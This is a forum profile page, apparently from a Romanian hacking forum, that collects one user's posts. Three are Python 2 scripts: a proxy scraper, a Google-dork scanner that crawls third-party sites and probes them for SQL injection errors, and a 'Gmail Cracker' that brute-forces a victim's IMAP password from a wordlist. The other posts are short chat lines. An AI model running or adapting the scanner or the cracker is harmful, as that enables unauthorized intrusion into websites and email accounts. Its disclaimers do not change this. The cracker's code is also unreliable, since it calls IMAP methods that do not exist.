Jump to content

Romania-

Members
  • Posts

    42
  • Joined

  • Last visited

Everything posted by Romania-

  1. #Python 2.7.7 HTTP Proxy Scraper import urllib2 from urllib2 import urlopen from BeautifulSoup import BeautifulSoup from random import randint dots ='..............................................................................?..' print'Python 2.7.7' print' Welcome to Python Proxy Scraper' print' Type "Help" for Help' print' 14 User-Agent Edition' print(dots) cL = ['view user agents', 'help', 'credits', 'command list', 'start',] userAgents = [ 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061026 BonEcho/2.0', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.12pre) Gecko/20080103 BonEcho/2.0.0.12pre', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071113 BonEcho/2.0.0.9', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)', 'Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Acoo Browser; InfoPath.2; .NET CLR 2.0.50727; Alexa Toolbar)', 'Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02', 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; TheWorld)', ] mainUrl = ('http://free-proxy-list.net/') # Target web page. mainLoop = True searchLoop = False searchLoop = False myInt1 = (0) # I've used this as a counter for later, once it reaches a certain number it will reset. myInt2 = (0) # That Certain number is the pattern location for the proxies within a table, example.. there is a proxy every 8 cells. while mainLoop: userInput = raw_input('<>< ') if userInput ==(cL[0]): # view agents for x in range(0, (len(userAgents))): print(dots) print(x, userAgents[x]) print(dots) elif userInput ==(cL[1]): # help print('<>< Version 1.0') print('<>< Compatible with Python 2.7.7, maybe unstable on other versions.') print('<>< Type command list for a list of commands..') print('<>< Feel free to edit/tweak my script give credit where needed if repost.') print(dots) print('<>< In order to get this to work you might need to tweak some veriables in the code sorry skids...') print('<>< Default Target http://free-proxy-list.net.') print('<>< This script will scrape proxies from mainUrl.') print('<>< The script will then use BeautifulSoup to isolate the table containing the proxies and ports.') print('<>< The script will then remove any unwanted characters and spaces and present you a nicely formated list of proxies') print(dots) elif userInput ==(cL[2]): # credits print('<>< Kopuz 2014') print('<>< Feel free to edit/tweak my script give credit where needed if repost.') print(dots) elif userInput ==(cL[3]): # command list print(dots) print(cL) print(dots) elif userInput ==(cL[4]): # start searchLoop = True while searchLoop: try: agentSelect = randint(0, 14) webReq = urllib2.Request(mainUrl) print('<>< Starting Proxy Scrape At ' + mainUrl) webReq.add_unredirected_header('User-Agent', userAgents[agentSelect]) print('<>< Agent: ' + userAgents[agentSelect]) thePage = urlopen(webReq) theText = thePage.read() print('<>< Raw data gathered, would you like to sort and view? y/n') userInput = raw_input('<>< ') if userInput == ("y"): soup = BeautifulSoup(theText) rawProx = soup.find('tbody') # Key world to isolate proxy table in HTML document. tableD = rawProx.findAll('td') # To furth isolate the table cells. for x in xrange(len(tableD)): myInt1 += 1 myInt2 += 1 if myInt1 == 8: # Every 8 cell is a proxy. myInt = myInt2 +1 # Assuming the port is in the next cell. strBuilder = (tableD[myInt2],":",tableD[myInt]) theString = str(strBuilder) noSpace = theString.replace(" ", "") noComma = noSpace.replace(",", "") noTd = noComma.replace("<td>", "") noCtd = noTd.replace("</td>", "") noSQ = noCtd.replace("'", "") noBo = noSQ.replace("(", "") noBc = noBo.replace(")", "") print (noBc) myInt1 = 0 searchLoop = False elif userInput == ("n"): searchLoop = False except Exception: continue else: print'<>< Unknown Command'
  2. #-*- coding: cp1254 -*- #!/usr/bin/python import re import urllib import urllib2 import urlparse import mechanize import webbrowser import os import random import colorama colorama.init() import threading print """ Gooogle Dork Scanner V 0.2 Concat : b3mb4m@gmail.com https://github.com/b3mb4m Video Link : http://www.youtube.com/watch?v=LzX7rt0hdrg """ print "" dork = raw_input("Dork : ") print "" appurls=[]#app urls useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'] agents = random.choice(useragent) uagent= {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'} b3mb4m = [] def collecturls(): br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', agents)] page = ["0"]#You can change if u want for i in page: try: google = "https://www.google.com/search?num=10&q="+dork+"&start="+i htmltext = br.open(google).read() pattern = re.compile("<h3 class=\"r\"><a href=\"/url\?q=(.*?)&amp.*?\">.*?</a></h3>") # grep url found = re.findall(pattern,htmltext) #time.sleep(4) print "\n[+]URL Search "+i #time.sleep(5) except: pass for i in found: #url = urlparse(i).netloc url = urlparse.urlparse(i).netloc if "google" in i: pass elif "youtube" in i: pass elif "vimeo" in i: pass elif "facebook" in i: pass elif "pastebin" in i: pass elif "zone-h" in i: pass elif "4shared" in i: pass elif "fulldownloadshare" in i: pass elif "rapidsharemix" in i: pass elif "ethicalhackx" in i: pass elif "systemanforderungen" in i: pass elif "gamesystemrequirements" in i: pass elif "gepigeny" in i: pass else: appurls.append(url) for i in set(appurls): if i.startswith("http://"): i = i.replace("http://", "") print "\n\tI fixed link ", i elif i.startswith("https://"): i = i.replace("https://", "") print "\n\tI fixed link ", i else: i = i #print i urlqeqe = "http://viewdns.info/reverseip/?host=%s&t=1" % (i) req = urllib2.Request(urlqeqe, headers=uagent) fd = urllib2.urlopen(req) data = fd.read() baglantilar = re.findall("<tr><td>\S+</td><td", data) for i in baglantilar: i = i.replace("<tr><td>", "").replace("</td><td", "") #print i if i.startswith("http://"): pass else: i = "http://"+i if "Domain" not in i: #print "\n\t"+i b3mb4m.append(i) else: pass def sqltest(): print " \n Targets Loading \n " for url in set(b3mb4m): print url for url in set(b3mb4m): #for url in sites: print "[+] Target "+url tarayici = mechanize.Browser() tarayici.set_handle_robots(False) tarayici.addheaders = [('User-agent', agents)] urls = [url] gez = [url] sayma = 0 try: while len(urls)>0: try: tarayici.open(urls[0]) urls.pop(0) try: for link in tarayici.links(): yeniurl = urlparse.urljoin(link.base_url,link.url) if yeniurl not in gez and url in yeniurl: gez.append(yeniurl) urls.append(yeniurl) try: sayma = sayma+1 if sayma == 100: urls = 0 except: break if "=" in yeniurl: yeniurl = yeniurl.replace("=", "='") print colorama.Fore.RED + "[+] Value Found " + yeniurl elif ".html" in yeniurl: yeniurl = yeniurl.replace(".html", "'.html") print colorama.Fore.MAGENTA + "[+] Value Found " + yeniurl else: yeniurl = yeniurl + "'" #print colorama.Fore.WHITE + "[-] No Value " + yeniurl try: req = urllib2.Request(yeniurl, headers=uagent) fd = urllib2.urlopen(req) data = fd.read() if "Query failed" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "supplied argument is not a valid MySQL result resource in" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "You have an error in your SQL syntax" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "ORDER BY" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "mysql_num_rows()" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "SQL query failed" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "Microsoft JET Database Engine error '80040e14'" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "Microsoft OLE DB Provider for Oracle" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "Error:unknown" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "Fatal error" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "mysql_fetch" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "Syntax error" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 elif "error in your SQL syntax" in data: print "--> "+yeniurl webbrowser.open(yeniurl) urls = 0 else: pass except: pass except: break except: urls.pop(0) except: pass collecturls = threading.Thread(name='collecturls', target=collecturls) sqltest = threading.Thread(name='sqltest', target=sqltest) collecturls.run() sqltest.run()
  3. #!/usr/bin/python # -*- coding: utf-8 -*- # Gmail Cracker V 1 Priv8 By Mauritania Attacker # This program is only for educational purposes only. # To Make This Cracker Work 100% , you need to install Mechanize Python Module # Link Download ===> https://pypi.python.org/pypi/mechanize/ # If you need a Good Wordlist ====> http://pastebin.com/ZGGNM8SM or make yours import sys, imaplib, time from imaplib import IMAP4 log = "GmailGhost.log" file = open(log, "a") counter = 0 face = ''' :::Gmail Cracker v 1::: +=======================================+ |..........Gmail Cracker v 1...........| +---------------------------------------+ | Author : Mauritania Attacker | | Use At your Own Risk | | Contact:No Need | | This tool is made for pentesting. | | Do not use this tool on any account | | Without permission of the account | | holder. | | We take no responsibilities for the | | use of this program | +---------------------------------------+ ''' help = ''' Usage : ./gmail.py -u [email] -w [wordlist] Example : ./gmail.py -u victim@gmail.Com -w wordlist.txt ''' for arg in sys.argv: if arg.lower() == '-u' or arg.lower() == '--user': email = sys.argv[int(sys.argv.index(arg))+1] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': print face print help file.write(face) file.write(help) #Change these if needed. HOST = 'imap.gmail.com' PORT = 993 try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except(IOError): print "\n[-] Error: Check your wordlist path\n" file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) def definer(): print "-" * 60 print "[+] Email : %s" % email print "[+] Wordlist : %s" % wordlist print "[+] Length wordlist : %s " % len(words) print "[+] Time Starting : %s" % time.strftime("%X") print "-" * 60 file.write ("\n[+] Email : %s" % email) file.write ("\n[+] Wordlist : %s" % wordlist) file.write ("\n[+] length wordlist : %s " % len(words)) file.write ("\n[+] Time Starting : %s" % time.strftime("%X")) def main(password): global counter sys.stdout.write ("[-] Trying : %s \n" % (password)) sys.stdout.flush() file.write("[-] Trying : %s \n" % (str(password))) try: IMAP4 = imaplib.IMAP4_SSL(HOST, PORT) IMAP4.Email(email) IMAP4.Passwd(password) IMAP4.quit() print "[+] enjoy !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Found!" % (email, password) file.write("[+] enjoy !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Found!" % (email, password)) sys.exit(1) except Exception, e: pass except KeyboardInterrupt: print "\n[-] Aborting...\n" file.write("\n[-] Aborting...\n") sys.exit(1) counter+=1 if counter == len(words)/5: print "[+] Gmailcracker 20% way done..." print "[+] Please be patient..." file.write("[+] Gmailcracker on 1/4 way done...\n") file.write("[+] Please be patient...\n") elif counter == len(words)/4: print "[+] Gmailcracker 25% way done..." print "[+] Please be patient..." file.write("[+] Gmailcracker on 1/4 way done...\n") file.write("[+] Please be patient...\n") elif counter == len(words)/2: print "[+] Gmailcracker on 50% done..." print "[+] Please be patient..." file.write("[+] Gmailcracker on halfway done...\n") file.write("[+] Please be patient...\n") elif counter == len(words): print "[+] Gmailcracker done...\n" file.write("[+] Gmailcracker done...!\n") if __name__ == '__main__': print face file.write(face) definer() for password in words: main(password.replace("\n","")) main(password)
  4. Da este teapa ..
  5. Cum faci credite?
  6. Salut sunt Romania- si am aflat de la voi de pe google . Eu ma ocup deocamdata de programare (vb.NET , Ajax Javascript,HTML,PHP,C++/C si nitel perl) Acum de curand m-am apucat si de pentesting am invatat ce cum sta treaba si am venit aici sa mai invat cate ceva
  7. Coaie . nu tia citit toata pagina , dai F5 ..
×
×
  • Create New...